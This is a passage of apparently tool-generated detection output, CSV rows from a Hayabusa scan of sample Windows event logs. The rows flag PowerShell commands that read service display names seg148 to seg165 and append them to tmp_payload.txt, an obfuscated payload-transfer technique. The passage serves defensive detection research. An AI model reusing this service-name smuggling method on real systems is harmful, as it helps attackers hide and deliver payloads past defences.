payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:01.137 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:02.574 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:02.574 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:02.574 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:04.025 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:04.025 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:04.025 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:05.482 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:05.482 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:05.482 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:06.935 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:06.935 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:06.935 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:08.391 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:08.391 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:08.391 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:09.863 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:09.863 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:09.863 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:11.334 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:11.334 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:11.334 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:12.782 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:12.782 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:12.782 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:14.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:14.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:14.217 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:15.662 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:15.662 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:15.662 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:17.100 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:17.116 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:17.116 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:18.559 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:18.559 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:18.559 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:20.048 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:20.064 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:20.064 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:21.525 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:21.525 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:21.525 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:22.968 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:22.984 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:22.984 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:24.421 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:24.437 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:24.437 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:25.872 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:25.884 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:25.884 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:27.322 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:27.338 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
